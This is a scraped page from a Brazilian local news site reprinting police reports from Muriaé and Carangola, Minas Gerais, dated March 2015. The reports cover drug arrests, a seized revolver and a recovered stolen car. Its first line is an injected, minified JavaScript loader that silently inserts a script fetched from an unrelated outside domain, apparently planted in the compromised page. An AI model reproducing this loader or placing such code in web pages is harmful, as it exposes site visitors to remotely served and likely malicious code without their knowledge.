;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Ocorrências policiais em destaque-Carangola e Região 04/03/15. - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Ocorrências policiais em destaque-Carangola e Região 04/03/15.

pmOCORRÊNCIAS DE DESTAQUE MURIAÉ – 04/03/2015
76ª CIA PM – MURIAÉ-MG
PM PRENDE AUTORES POR TRÁFICO DE DROGAS NO BAIRRO JOSÉ CIRILO EM MURIAÉ

Em 03/03/2015, por volta das 14h10min, na Avenida Altino Rodrigues Pereira, no Bairro José Cirilo, C.H.M.P., de 19 anos; e L.O.S., de 23 anos, foram capturados em flagrante e apresentado na DEPOL. Ocupavam o FIAT UNO, placas oficiais de TUMIRITINGA/MG, que apresentava alteração na numeração do chassi. Os abordados não são funcionários da prefeitura de TUMIRITINGA e, provavelmente, o veículo foi adquirido em leilão. Com os mesmos, foram encontrados alguns papelotes de cocaína e pequena porção de maconha, além de R$235,00 em dinheiro. O veículo foi recolhido ao pátio credenciado. Ambos autuados.

PM APREENDE ARMA DE FOGO COM INDIVÍDUOS EM UM TÁXI – MURIAÉ

Em 03/03/2015, por volta das 23h35min, na Rua Rosa Moreira, no Bairro Santo Antônio, D.M.P., de 23 anos e D.A.I., de 17 anos, foram capturados em flagrante e apresentados na DEPOL. Durante a abordagem a um táxi que conduzia os indivíduos, os militares encontraram e arrecadaram um revólver cal. 32, TAURUS, municiado com cinco cartuchos, três intactos, e duas pedras grandes de CRACK. O primeiro assumiu a autoria do porte ilegal da arma, alegando estar sendo ameaçado.

75ª CIA PM – CARANGOLA-MG
PM LOCALIZA VEÍCULO COM REGISTRO DE ROUBO NA ZONA RURAL DE ORIZÂNIA

Em 03/03/2015, por volta das 13h, na Fazenda Santo Antônio do Arrozal, zona rural de Orizânia, foi localizado e recolhido ao pátio credenciado o FIAT UNO, cor branca, sendo certo que havia um registro de roubo do mesmo, pela PRF. A perícia foi acionada, porém não compareceu. Populares informaram que um indivíduo de cútis parda conduzia o veículo em alta velocidade, quando acidentou caindo numa canaleta. A seguir o infrator evadiu e não foi localizado.

ASSESSORIA DE COMUNICAÇÃO ORGANIZACIONAL DO 47° BPM
RUA JOSÉ DE FREITAS LIMA Nº 47 – BAIRRO SAFIRA
MURIAÉ / MG
TELEFONE: 3696-3275. 3696-3265

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.